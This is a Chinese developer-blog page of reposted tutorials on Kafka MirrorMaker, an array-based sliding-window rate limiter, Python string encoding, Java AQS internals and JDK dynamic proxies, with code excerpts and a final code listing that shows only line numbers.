开发者博客 – IT技术 尽在开发者博客

开发者博客 – 科技是第一生产力


  • 首页

  • 归档

  • 搜索

Kafka 的跨集群信息拷贝方案 MiirorMaker

发表于 2021-11-29

这是我参与11月更文挑战的第28天,活动详情查看:2021最后一次更文挑战

相关:Kafka 目录里的脚本那么多,它们都是用来干什么的?

在 《Kafka 目录里的脚本那么多,它们都是用来干什么的?》这篇里,介绍了一些 Kafka 运维脚本,在 Kafka 的脚本目录中,还有一个 kafka-mirror-maker.sh 脚本,这篇与它有关。

在绝大多数生产场景下,Kafka 都是作为集群来使用的,在灾备、基于地理位置的低延迟服务等场景下,甚至会部署多个集群,在集群之间进行数据同步。当前,实现集群间数据拷贝的方案有很多,MirrorMaker 是 Kafka 社区提供的方案,最主要的功能就是实现集群到集群的数据拷贝。

下面简单介绍 MirrorMaker。

MirrorMaker 本质上是一个「消费者+生产者」的程序,它实现数据拷贝的方式,是作为消费者从源 Kafka 集群获取消息,然后又作为生产者把消息提交到目标 Kafka 集群。

image.png

如果不深入细节的话,它的原理看起来非常容易理解,下面看一下它的用法。

运行 MirrorMaker 主要是通过 Kafka 目录下的 bin/kafka-mirror-maker.sh 脚本完成的。运行脚本的时候,需要我们提供如下的参数:

  • consumer.config:这个参数用来指定一个文件路径,作为 MirrorMaker 作为消费者的配置信息,其中最重要的配置是 bootstrap.servers 也就是消费消息的源 Kafka 集群。除此之外,MirrorMaker 会在内部创建不止一个消费者实例,因此需要再指定一个 group.id。为了让 MirrorMaker 可以从头消费信息,再配置 auto.offset.reset=earliest。以上这些是最小必要的配置,其它的配置视情况而定。
  • producer.config:作用与 consumer.config 类似,是 MirrorMaker 作为生产者的配置参数文件,在这个文件中,最少需要配置 bootstrap.servers 即可。
  • num.streams:这个参数用来告诉 MirrorMaker,需要创建多少个消费者实例,在 MirrorMaker 中,多个消费者实例的创建是通过多线程来实现的。
  • whitelist:这里可以让我们提供一个正则表达式,只有名称匹配这个正则表达式的主题会被拷贝数据。这样,可以将不同主题的数据拷贝到不同的目标集群中。

结合这些参数,最终的命令类似一下内容:

1
css复制代码$ bin/kafka-mirror-maker.sh --consumer.config path/to/consumer-config.properties --producer.config ./path/to/producer-config.properties --num.streams 7 --whitelist ".*"

如果已经成功启动了源 Kafka 集群和目标 Kafka 集群,那么在需要启动 MirrorMaker 的机器上,运行这个命令即可。

有一点要注意的是,如果目标集群上还没有创建要拷贝数据的 Topic,那么,它会根据 Broker 端的参数重指定的分区数和副本数,这可能和源 Kafka 集群上的该主题的分区数和副本数不一致,或者不符合我们的预期,因此,推荐提前在目标集群上创建好主题。

本文转载自: 掘金

开发者博客 – 和开发相关的 这里全都有

如何使用数组实现滑动窗口

发表于 2021-11-29

在FireflySoft.RateLimit之前的版本中,进程内滑动窗口的实现是基于MemoryCache做的,虽然能够正确的实现滑动窗口的算法逻辑,但是性能比较差,其吞吐量只有其它算法的1/4。性能为何如此之差呢?

滑动窗口的原理

我们先来看下滑动窗口的原理,这里给一张图:

如上图所示:

  • 滑动窗口的时间跨度是5秒,每个计数周期的时间跨度是1秒,所以此处的滑动窗口包含5个计数周期。
  • 随着时间的前进,滑动窗口包含的计数周期会以秒为单位向前移动,但始终是包含5个计数周期。
  • 判断是否限流时,需要将当前滑动窗口包含的5个计数周期的计数值加起来。
  • 相比固定窗口计数器算法,滑动窗口允许一些突发流量,如上图中的第7个计数周期。

MemoryCache实现的滑动窗口

使用MemoryCache时,存储结构如下:

每个计数周期都作为一个缓存项目添加到MemoryCache中,缓存Key为计数周期的绝对时间,缓存值为当前周期的计数值,缓存过期时间为一个大于滑动窗口时间跨度的相对过期时间,这样不用自己编码删除过期的计数周期,而滑动窗口内的计数周期都能正常保留。

另外为了获得滑动窗口内部每个计数周期对应的缓存项,这里还额外缓存了第一个计数周期的缓存Key(即对应的绝对时间),这样就可以根据当前时间和计数周期的时间跨度计算出当前周期的缓存Key,从而可以再逐步向前推出4个计数周期的缓存Key。

如有兴趣,具体实现可以点击这里进入Github查看。

这个实现有两个问题:

  • 每个计数周期都是一个单独的缓存项,随着时间的前进需要不断申请内存,在堆上申请内存是一个相对耗时的操作。
  • 每次计数都要先计算出滑动窗口内当前的所有计数周期,然后再把它们一个个取出来,求计数值的和,计算量较多。

这应该就是这个算法实现性能比较差的主要原因。

基于数组的滑动窗口

为什么要使用数组来实现滑动窗口呢?首先当然是数组可以实现滑动窗口,其次它可以解决MemoryCache实现中的两个问题,一是数组创建时就申请了固定大小的内存,后续计数都使用这块内存,不用再新申请;二是计算滑动窗口内的计数值只要把数组中每个元素的值加起来就行了,不用再一个个的寻找它们。

学过操作系统的同学可能比较了解,在操作系统中很多地方使用了环形队列,而环形队列是用数组实现的;滑动窗口可以理解为环形队列的一个特例,每次窗口滑动时,队列弹出一个,然后再进入一个。

理解数组实现的滑动窗口,看下边这个图就可以了。

假设滑动窗口的时间跨度还是5s,计数周期的时间跨度是1秒。

首先我们初始化一个容量为5的空数组,此时还没有开始计数,所以只是一个空数组。

  • 第1秒,开始计数,此时数组内开始存入计数周期,保存在数组第1个位置,(1)表示这是当前滑动窗口内的第1个计数周期。如果我们把滑动窗口看成一个环形队列,那么队列的头尾此时都是数组的第1个元素。
  • 第2秒,数组又存入一个新的计数周期,保存在数组第2个位置,(2)表示这是当前滑动窗口内的第2个计数周期;此时队列的尾部来到了数组的第2个元素。
  • 以此类推,时间来到第5秒,此时数组内的每个位置都会存入一个计数周期,滑动窗口内的计数周期也达到了5个;队列的尾部也来到了数组的最后一个元素。
  • 第6秒,数组已经放不下第6个元素了,因为滑动窗口只需要最近的5个元素,所以我们可以丢弃数组中第1个元素中保存的计数周期,重新创建一个计数周期放进去。从滑动窗口的角度看,丢弃了一个计数周期,新创建的这个计数周期还是滑动窗口的第5个计数周期,原来的第(2)、(3)、(4)、(5)就变成了(1)、(2)、(3)、(4)。如果从循环队列的角度看,则队列头部弹出了一个元素,然后队列尾部增加了一个元素。
  • 以此类推,时间来到第7秒,代表滑动窗口的循环队列又弹出了一个过期的计数周期,然后插入新的计数周期。
  • 第9秒也是如此,只不过第9秒结束后,数组的存储结构又回到了第5秒时的样子,此时数组内的每个位置都有一个计数周期,这些计数周期在滑动窗口中的位置编号和数组中的位置编号完全相同。

然后随着时间的前进,滑动窗口的处理就是循环第5秒至第9秒之间的处理逻辑。

再说计数的处理:

  • 时间来到每一秒后, 首先会创建这一秒的计数周期,保存到数组中,在随后的这一秒的请求中,继续使用原来的计数周期,并累加计数值,直到下一秒到来。
  • 每次计算滑动窗口内的计数值时,因为数组的容量和滑动窗口的计数周期数保持一致,所以就是简单的把数组中每个小计数周期的计数值加起来,就可以了。

这里摘抄一些代码,让大家感受更深入一些:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
ini复制代码// 几个重要变量:保存计数周期的数组、代表滑动窗口的循环队列的头和尾
SlidingWindowPeriod[] _queue;
int _head = 0;
int _tail = 0;

// 省略很多代码....

// 创建一个计数周期,这里是一个结构体
var newPeriod = new SlidingWindowPeriod()
{
// 为了方便确定当前请求的计数周期,计数周期的Key是一个时间刻度,
Key = lastPeriod.Key + _statPeriodMilliseconds * i,
CountValue = 0
};

// 循环队列尾加1
// 如果超出了数组的索引范围,则代表需要替换数组中第1个位置的计数周期,然后队列尾来到数组中第1位
_tail++;
if (_tail == _length) _tail = 0;

// 如果队列尾在数组中的索引小于等于队列头的索引,则队列头需要弹出数据,队列头的位置向后移动1位
if (_tail <= _head)
{
_head++;
// 如果队列头的索引会超出索引范围,则队列头归位到数组中的第1位
if (_head == _length) _head = 0;
}
// 将新的计数周期写入队列尾所在的数组位置
_queue[_tail] = newPeriod;

这里边还会有一些特殊的处理,比如滑动窗口只包含一个小计数周期,再比如请求时间的前进是不均匀的(可能会跳过数个计数周期的时间跨度),都需要仔细考虑。

如果想了解完整的实现,查看全部代码,请点击进入GitHub。

本文转载自: 掘金

开发者博客 – 和开发相关的 这里全都有

python中的编码问题 decode 与 encode详解

发表于 2021-11-29

decode 与 encode详解

decode(解码)作用:将其他编码的字符串转换成unicode编码

例:str1.decode(‘gb2312’),表示将gb2312编码的字符串str1转换成unicode编码。

encode(编码)作用:将unicode编码转换成其他编码的字符串

例:str2.encode(‘utf-8’),表示将unicode编码的字符串str2转换成utf-8编码。

注意:decode和encode不加参数的时候默认参数为’utf-8

在做编码转换时,通常需要以unicode作为中间编码
,即先将其他编码的字符串解码(decode)成unicode,
再从unicode编码(encode)成另一种编码。

爬虫中的编码注意事项

有的时候需要用到请求对象的限制,即:

urlib.request.Request(url=url,data=data,headers=headers)

其中的data参数一般是字典,那么需要进行转换:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
python复制代码    import urllib.request
# 引入格式转换的模块
from urllib import parse

# 请求对象的限制所需数据url,headers以及data
url = 'htttp://www.baidu.com'
headers = {
'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36',
}
data = {
'name':'lihua',
'age':'15'
}

# 字典类型的data不符合要求,需进行以下转换!!!
# urlencode将字典类型的data转换成URL能识别的参数类型
# 即:name=lihua&age=15
# 同时使用encode()将其转换为utf-8格式,因为请求对象的限制中的data参数为bytes类型
# 即:b'name=lihua&age=15'
data = parse.urlencode(data).encode()

# 进行请求对象的限制,赋予request
request = urlib.request.Request(url=url,data=data,headers=headers)
#模拟浏览器打开request
response = urllib.request.urlopen(request)

# 获取到的某个网页源码有可能是utf-8,gb2312等编码格式,要想在终端输出源码,则需要进行解码(decode),变成unicode编码
content = response.read().decode()
print(content)

文件问题

1.在文件中直接写入str类型的字符,会导致乱码

1
2
3
ini复制代码string = '你好!我是中文'
fp =open('test.txt','w')
fp.write(string)

����������

2.为了解决乱码,将str类型转换为bytes类型,在写入

1
2
3
4
5
6
7
8
python复制代码    string = '你好!我是中文'
# 将文件编码为utf-8格式
string_exchange = string.encode() # <class 'bytes'>
# 参数:
# "w" - 写入 - 打开文件进行写入,如果文件不存在则创建该文件
# "b" - 二进制 - 二进制模式(例如图像)。
fp =open('test.txt','wb')
fp.write(string_exchange)

你好!我是中文

3.解决乱码的另一种形式

1
2
3
4
5
python复制代码    string = '你好!我是中文' 

#open函数内置encoding,为可选参数
fp =open('test.txt','w',encoding='utf-8')
fp.write(string)

你好!我是中文

本文转载自: 掘金

开发者博客 – 和开发相关的 这里全都有

AQS原理学习

发表于 2021-11-29

本人CSDN地址:blog.csdn.net/qq_43731074…

AQS是指JUC包下的AbstractQueuedSynchronizer的简称,它是Java锁以及一些同步器(JUC包)实现的核心,大部分JUC下的类内部的提供了一个实现了AQS的子类来提供辅助。
AQS还继承了一个AbstractOwnableSynchronizer类,它是AQS的实现的重要基础。
AQS实现主要是依赖一个先进先出(FIFO)的等待队列和一个volatile标记的int型state状态标记。
AQS的FIFO等待队列,是基于双向链表实现的,是典型的CLH队列改造而来
首先来看一下AQS类的一下成员变量

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
java复制代码public abstract class AbstractQueuedSynchronizer
extends AbstractOwnableSynchronizer
implements java.io.Serializable {
//等待队列头节点
private transient volatile Node head;

//等待队列的尾节点
private transient volatile Node tail;
/**
* Wait queue node class.
*
* <p>The wait queue is a variant of a "CLH" (Craig, Landin, and
* Hagersten) lock queue. CLH locks are normally used for
* spinlocks. We instead use them for blocking synchronizers, but
* use the same basic tactic of holding some of the control
* information about a thread in the predecessor of its node. A
* "status" field in each node keeps track of whether a thread
* should block. A node is signalled when its predecessor
* releases. Each node of the queue otherwise serves as a
* specific-notification-style monitor holding a single waiting
* thread. The status field does NOT control whether threads are
* granted locks etc though. A thread may try to acquire if it is
* first in the queue. But being first does not guarantee success;
* it only gives the right to contend. So the currently released
* contender thread may need to rewait.
* <p>To enqueue into a CLH lock, you atomically splice it in as new
* tail. To dequeue, you just set the head field.
* <pre>
* +------+ prev +-----+ +-----+
* head | | <---- | | <---- | | tail
* +------+ +-----+ +-----+
* </pre>
*
**/
//静态内部类,是实现等待队列的核心类,从上面官方解析也可以看出是一个双向链表实现的一个FIFO队列,该类主要是封装线程和维护线程的一些状态标记
//后面会单独分析该内部类
static final class Node{省略...}

//同步状态标记,只有该状态等于0的时候才表示可以当前是空闲的没有被占用的,此时可以换一个一个节点的线程来占用
private volatile int state;
//省略....
}

下面看看node类是如何实现的

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
java复制代码    static final class Node {
/**共享标记模式的标记 */
static final Node SHARED = new Node();
/** 独占模式的标记节点 */
static final Node EXCLUSIVE = null;

/** waitStatus状态标记等于-1表示节点以及被取消*/
static final int CANCELLED = 1;
/** 表示后继节点处于等待状态,如果当前节点同步状态是否或者取消则被唤醒 */
static final int SIGNAL = -1;
/** waitStatus表示线程正在condition等待条件上 */
static final int CONDITION = -2;
/** 下一次的共享模式同步状态的获取将会无条件的传播 */
static final int PROPAGATE = -3;
/* waitStatus的初始值时0,使用CAS来修改节点的状态 */
volatile int waitStatus;

/**
* 前驱节点
*/
volatile Node prev;

/**
* 后继节点
*/
volatile Node next;

/**
* 入队等待的线程
*/
volatile Thread thread;

/**
* 链接到下一个节点的等待条件,或特殊的值SHARED,因为条件队列只有在独占模式时才能被访问,
* 所以我们只需要一个简单的连接队列在等待的时候保存节点,然后把它们转移到队列中重新获取
* 因为条件只能是独占性的,我们通过使用特殊的值来表示共享模式
*/
Node nextWaiter;

/**
*判断是否共享模式
*/
final boolean isShared() {
return nextWaiter == SHARED;
}

/**
* 获取当前节点的前驱节点
* @return the predecessor of this node
*/
final Node predecessor() throws NullPointerException {
Node p = prev;
if (p == null)
throw new NullPointerException();
else
return p;
}

Node() { // Used to establish initial head or SHARED marker
}

Node(Thread thread, Node mode) { // 指点线程和模式的构造器
this.nextWaiter = mode;
this.thread = thread;
}

Node(Thread thread, int waitStatus) { // 指定线程和线程状态的构造器
this.waitStatus = waitStatus;
this.thread = thread;
}
}

AQS 的大体结构图:

在这里插入图片描述
下面以分析ReentrantLock为例分析分析独占模式下,整个获取同步状态成功以及失败的处理过程:

1
2
3
4
5
java复制代码    public final void acquire(int arg) {
if (!tryAcquire(arg) &&
acquireQueued(addWaiter(Node.EXCLUSIVE), arg))
selfInterrupt();
}

该方法主要是用于获取同步状态,主要分为几大步,第一步先通过tryAcquire(arg)第一次尝试获取同步状态,该方法AQS并没有实现,而是在相应的子类中实现比如Reentrantlock内部为了实现公平锁和非公平锁分别实现了不同逻辑的tryAcquire,如果该方法尝试获取同步状态失败,就进行第二步进入addWaiter(Node.EXCLUSIVE),该方法主要是把当前获取不到同步状态的线程进行封装成功一个node节点然后进入等待队列中,第三步就是进入等待队列之后,还好重新通过自旋尝试获取同步状态,自旋到一定程度,发现还是没有获取到同步状态则通过LockSupport类进行把线程挂起操作。如果中间出现被中断则线程进行自我中断。
接着看addWaiter方法

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
java复制代码    /**
* Creates and enqueues node for current thread and given mode.
*
* @param mode Node.EXCLUSIVE for exclusive, Node.SHARED for shared
* @return the new node
*/
private Node addWaiter(Node mode) {
//根据线程和模式,封装成一个node节点
Node node = new Node(Thread.currentThread(), mode);
// Try the fast path of enq; backup to full enq on failure
Node pred = tail;
//如果不是第一次入队
if (pred != null) {
//尾部添加该节点
node.prev = pred;
//然后通过cas设置为尾节点
if (compareAndSetTail(pred, node)) {
pred.next = node;
return node;
}
}
//如果第一次则进入enq方法进行创建
enq(node);
return node;
}

addWaiter方法主要是把无法获取到同步状态的线程封装成一个节点然后进入等待队列,如果是第一次入队,则擦黄金一个空节点作为哨兵节点用于唤醒后继节点的线程,如果不是第一次入队,则把当前线程的封装的节点从尾部添加,然后通过cas把该节点设置为尾节点。
下面来看看enq是如何实现:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
java复制代码    private Node enq(final Node node) {
for (;;) {
//获取尾节点
Node t = tail;
if (t == null) { // 如果等于空则创建一个空的node节点,并通过cas设置为头节点
if (compareAndSetHead(new Node()))
同时让尾节点执行同
tail = head;
} else {
//创建完一个队列后,非空状态则进入当前else然后在尾部添加当前线程封装的节点,再通过cas把节点设置成尾节点
node.prev = t;
if (compareAndSetTail(t, node)) {
t.next = node;
return t;
}
}
}
}

整个方法逻辑:首先通过自旋判断尾节点是否为空,如果为空则创建一个空节点,并且设置为头节点并且尾节点指向头节点,当再次循环的时候,此时尾节点已经不是空了,这时候把传入的node节点进行节点添加,并把设置为尾节点。

接着看acquireQueued在addwaiter方法添加线程进入等待队列是如何通过该方法重新尝试获取同步状态以及失败后是如何处理的。

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
java复制代码    final boolean acquireQueued(final Node node, int arg) {
//定义一个操作失败标记
boolean failed = true;
try {
//定义一个中断标记默认没不中断
boolean interrupted = false;
//下面是自旋
for (;;) {
//获取当前线程的前驱节点
final Node p = node.predecessor();
//判断是否是头节点,同时再次通过trayAcquire获取同步状态,如果是头节点并且获取同步状态成功(表明当前节点的线程已经被设置为同步状态的拥有者)
if (p == head && tryAcquire(arg)) {
setHead(node);//把当前传入进来的节点node设置为头节点,
p.next = null; // 断开与前驱节点的连接便于GC回收
failed = false;//表表示成功获取同步状态,返回中断标记
return interrupted;
}
//如果当前节点的前驱节点不是头节点,即当前节点不是第一个线程,则尝试判断是否应该把该线程挂起,
//如果适合挂起则调用parkAndCheckInterrupt进行挂起(实现挂起操作是利用LockSupport.park(this))
if (shouldParkAfterFailedAcquire(p, node) &&
parkAndCheckInterrupt())
interrupted = true;
}
} finally {
//如果操作失败则放弃获取同步状态
if (failed)
cancelAcquire(node);
}
}

该方法主要逻辑:首先判断当前节点的前驱节点是否是头节点并且通过tryacquire方法再次获取同步状态如果成功则表明该线程是第一个线程则直接执行,并把该节点设置为新的头节点,并把前驱节点断开以便于gc回收,然后返回,第二种情况就是非第一个线程,在进入shouldParkAfterFailedAcquire方法判断是否适合挂起,如果适合则调用parkAndCheckInterrupt方法去执行 LockSupport.park(this);进行挂起操作。
接着看看shouldParkAfterFailedAcquire是如何判断是否应该挂起的

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
java复制代码    private static boolean shouldParkAfterFailedAcquire(Node pred, Node node) {
//获取前驱节点的ws判断处于那种状态。
int ws = pred.waitStatus;
//如果是SIGNAL(-1)表示当前前驱节点释放后会唤醒当前节点node,则可以安全挂起
if (ws == Node.SIGNAL)
return true;
if (ws > 0) {
/*
* Predecessor was cancelled. Skip over predecessors and
* indicate retry.
* 如果前驱节点的状态是>0表示已经被取消或者说放弃了,则跳过该前驱节点,通过选好当前节点的前驱节点一直
* 找到状态ws<0的第一个节点为止,然后把当前node节点连接在该节点的后继节点上
*/
do {
node.prev = pred = pred.prev;
} while (pred.waitStatus > 0);
pred.next = node;
} else {
/*
* 如果前驱节点是0或者propagate则表示前驱节点正在占用同步状态此时需要设置一个signal,不能挂起,
* 需要重新确定不能获取之后才可以被挂起
*/
compareAndSetWaitStatus(pred, ws, Node.SIGNAL);
}
//返回不能被挂起
return false;
}
//如果判断释放被挂起方法返回true则调用该方法进行挂起操作。
private final boolean parkAndCheckInterrupt() {
LockSupport.park(this);
return Thread.interrupted();
}

判断释放适合挂起方法,分三步,第一步判断前驱节点释放状态之后会唤醒node节点,则可以安全的挂起,第二步,如果前驱节点已经放弃获取,则通循环获取第一个还没放弃获取的节点然后让node节点接上去。第三步,如果前驱节点正处于持有同步状态或者是共享模式,则需要设置前驱节点的ws状态标记为SIGNAL表示释放同步状态后唤醒该后承节点。

如果同步状态获取失败,挂起也失败了,则会执行取消获取方法cancelAcquire

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
java复制代码    private void cancelAcquire(Node node) {
// 判断npe
if (node == null)
return;
把节点线程置为null
node.thread = null;

// 获取当前节点的前驱节点并且判断状态设置前驱节点
Node pred = node.prev;
//如果前驱节点ws>0表示已经放弃获取,则循环获取ws小于0的并连接起来
while (pred.waitStatus > 0)
node.prev = pred = pred.prev;

// 获取前驱接i单独后继节点
Node predNext = pred.next;

// 把node节点的状态标记改完取消状态
node.waitStatus = Node.CANCELLED;

// 如果node是后继节点,则通过cas把前驱节点设置我为尾节点,同时把后继节点设置为null
if (node == tail && compareAndSetTail(node, pred)) {
compareAndSetNext(pred, predNext, null);
} else {
// 如果前驱节点不是头节点,ws小于0以及通过cas设置前驱节点ws状态为signal成功,并且前驱节点线程不为空则
//则把前驱节点的后继节点设置为当前节点的后继节点
int ws;
if (pred != head &&
((ws = pred.waitStatus) == Node.SIGNAL ||
(ws <= 0 && compareAndSetWaitStatus(pred, ws, Node.SIGNAL))) &&
pred.thread != null) {
Node next = node.next;
if (next != null && next.waitStatus <= 0)
compareAndSetNext(pred, predNext, next);
} else {//如果是头节点则唤醒他的后继节点
unparkSuccessor(node);
}
//让node节点指向node方便GC
node.next = node; // help GC
}
}

接着看unparkSuccessor是如何唤醒后继节点的

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
java复制代码    private void unparkSuccessor(Node node) {
/*
* 获取node的ws,如果小于0则通过cas设置为0
*/
int ws = node.waitStatus;
if (ws < 0)
compareAndSetWaitStatus(node, ws, 0);

/*
* 获取当前节点的后继节点
*/
Node s = node.next;
//判断s,如果等于null并且ws>0放弃获取
if (s == null || s.waitStatus > 0) {
s = null;//置为null
//从尾节点开始循环获取前驱节点直到获取到最前面一个ws小于0的节点
for (Node t = tail; t != null && t != node; t = t.prev)
if (t.waitStatus <= 0)
s = t;
}
然后如果s节点不为null,证明获取到了最前面一个ws小于0的节点,则直接唤醒该节点的线程。
if (s != null)
LockSupport.unpark(s.thread);
}

下面分析AQS中release()方法是如何释放同步状态并且唤醒线程来执行的

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
java复制代码    public final boolean release(int arg) {
//tryrelease方法和tryacquire方法是一对的,该方法也是由子类来实现
if (tryRelease(arg)) {
Node h = head;//获取头节点
//判断释放不等于空,或者状态释放不等于0,如果都符合则通过unparkSuccessor方法唤醒后继节点
if (h != null && h.waitStatus != 0)
unparkSuccessor(h);
return true;
}
return false;
}
//这里举例reentrantlock方法中非公平锁实现的tryRelease方法
protected final boolean tryRelease(int releases) {
//获取AQS的同步状态值,然后减去释放的数值
int c = getState() - releases;
//判断当前线程释放是同步状态拥有者,如果不是则抛出一个异常
if (Thread.currentThread() != getExclusiveOwnerThread())
throw new IllegalMonitorStateException();
//标记释放失败
boolean free = false;
//如果c==0表明同步状态完全释放了(存在重入的情况同步状态可能大于1)
if (c == 0) {
free = true;//设置释放成功
setExclusiveOwnerThread(null);//把同步状态持有线程修改为null
}
//重新设置AQS状态(这里可能是0或者大余1(重入的情况))
setState(c);
return free;
}

到这里,独占模式同步状态的获取以及释放过程都分析完,其他的待续。。。。

本文转载自: 掘金

开发者博客 – 和开发相关的 这里全都有

jdk动态代理原理分析

发表于 2021-11-29

1.什么是代理模式?

  • 例子
    在了解Java动态代理技术之前,先了解一下什么是代理模式,其实代理模式在生活中很常见,比如房东与中介其实就是一个代理的过程,房东有自己的房子,在代理模式中扮演角色是被代理对象,中介扮演角色是代理对象,此时有租客想租房子,由于中介已经代理了房东的房子,所以租客(客户端)可以直接通过中介(代理对象)询问自己需要的房子类型(忽略租客直接找房东),中介由于代理了房东的房子(被代理对象),当然中介可以代理多个房东的房子,以应对不同的租客(客户端).这 个过程其实就是代理模式
  • 结论
    代理模式的角色:代理对象、被代理对象、公共抽象类(租客要找的房子类型在中介中要有)
    代理对象可以代理一个或者多个对象(其实都是代理一个,多个对象的概念从接口维度出发,一个对象实现多个接口)
    代理模式可以起到一个隔离的作用
    代理模式可以统一为被代理对象做处理
  • 代理模式的几种实现方式
1. 静态代理
静态代理实现起来相对简单,首先从从上面我们知道代理对象的几个角色,一个公共抽象接口、一个代理对象、一个被代理对象,所以只需要在代理对象里记录被代理对象的引用即可
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
java复制代码public class StudentProxy implements Person {
private Person person;

public StudentProxy(Person person) {
this.person = person;
}

@Override
public void queryScore(String courseName) {
person.queryScore(courseName);
}
}
public class Student implements Person{
private String userName;

public Student(String userName) {
this.userName = userName;
}
@Override
public void queryScore(String courseName) {
System.out.println(this.userName+"查"+courseName+"的成绩");
}
}
public interface Person {
void queryScore(String courseName);
}

总结: 1.静态代理,实现简单,但如果存在多个类要被代理,则需要为每个被代理类建立一个代理类,并且每个方法都要重写,然后在方法中调用被代理对象对于的方法。2.代理对象是我们人为编写的。)
2. 动态代理

  • JDK动态代理
    实现原理以及技术,首先jdk动态代理的实现是基于Java反射技术以及字节码生成技术来实现的,它是先通过反射获取到被代理类的方法然后生成一个包含了被代理类所有方法的Proxy子类来实现代理。
    jdk动态代理的代理对象是动态生成的,并非手动编写
    实现代码
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
java复制代码public interface Good {
void produce();
}

public interface Person {
void queryScore(String courseName);
}
public class Student implements Person{
private String userName;

public Student(String userName) {
this.userName = userName;
}
@Override
public void queryScore(String courseName) {
System.out.println(this.userName+"查"+courseName+"的成绩");
}
}

public class PersonInvocation<T> implements InvocationHandler {
private T target;
private Object target2;
public PersonInvocation(T target) {
this.target = target;
}

public PersonInvocation(T target, Object target2) {
this.target = target;
this.target2 = target2;
}

@Override
public Object invoke(Object proxy, Method method, Object[] args) throws Throwable {
System.out.println("代理前置处理....");
System.out.println(proxy.getClass().getName());
Object result = method.invoke(target, args);
System.out.println("代理后置处理.....");
return result;
}
}
public class Test {
public static void main(String[] args) throws NoSuchMethodException, IllegalAccessException, InvocationTargetException, InstantiationException, IOException {
Person stu1 = new Student("zs");
PersonInvocation personInvocation = new PersonInvocation<>(stu1);
//获取根据类加载器以及接口集生成的代理类
Class<?> proxyClass = Proxy.getProxyClass(Student.class.getClassLoader(),Person.class,Good.class);
//根据代理类和构造器参数获取类构造器
Constructor<?> constructor = proxyClass.getConstructor(InvocationHandler.class);
//执行被代理后的被代理对象
Person o = (Person) constructor.newInstance(personInvocation);
Good good = (Good) constructor.newInstance(personInvocation);
good.produce();
//上面代码等同与下面这一条语句
Good proxyInstance = (Good) Proxy.newProxyInstance(Person.class.getClassLoader(), new Class[]{Person.class,Good.class}, personInvocation);
byte[] proxyClassArr = ProxyGenerator.generateProxyClass(proxyInstance.getClass()
.getSimpleName(), proxyInstance.getClass().getInterfaces());
//将字节码文件保存到D盘,文件名为$Proxy0.class
FileOutputStream outputStream = new FileOutputStream(new File(
"proxyInstance.class"));
outputStream.write(proxyClassArr);
outputStream.flush();
outputStream.close();
proxyInstance.produce();
}
}
//代理类
public final class $Proxy0 extends Proxy implements Person, Good {
private static Method m1;
private static Method m2;
private static Method m3;
private static Method m0;
private static Method m4;
//省略.....
public final void gaiveMoney() throws {
try {
super.h.invoke(this, m3, (Object[])null);
} catch (RuntimeException | Error var2) {
throw var2;
} catch (Throwable var3) {
throw new UndeclaredThrowableException(var3);
}
}
public final void produce() throws {
try {
super.h.invoke(this, m4, (Object[])null);
} catch (RuntimeException | Error var2) {
throw var2;
} catch (Throwable var3) {
throw new UndeclaredThrowableException(var3);
}
}
static {
try {
m1 = Class.forName("java.lang.Object").getMethod("equals", Class.forName("java.lang.Object"));
m2 = Class.forName("java.lang.Object").getMethod("toString");
m3 = Class.forName("learning.proxy.Person").getMethod("gaiveMoney");
m0 = Class.forName("java.lang.Object").getMethod("hashCode");
m4 = Class.forName("learning.proxy.Good").getMethod("produce");
} catch (NoSuchMethodException var2) {
throw new NoSuchMethodError(var2.getMessage());
} catch (ClassNotFoundException var3) {
throw new NoClassDefFoundError(var3.getMessage());
}
}
}

总结: 从代码反编译后的代理类实现可以看到,如果从接口维度出发确实可以代理多个对象,另外可以看出jdk动态代理是在运行时动态生成字节码技术以及反射技术来实现的.
源码分析

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
131
132
133
134
135
136
137
138
139
140
141
142
143
144
145
146
147
148
149
150
151
152
153
154
155
156
157
158
159
160
161
162
163
164
165
166
167
168
169
170
171
172
173
174
175
176
177
178
179
180
181
182
183
184
185
186
187
188
189
190
191
192
193
194
195
196
197
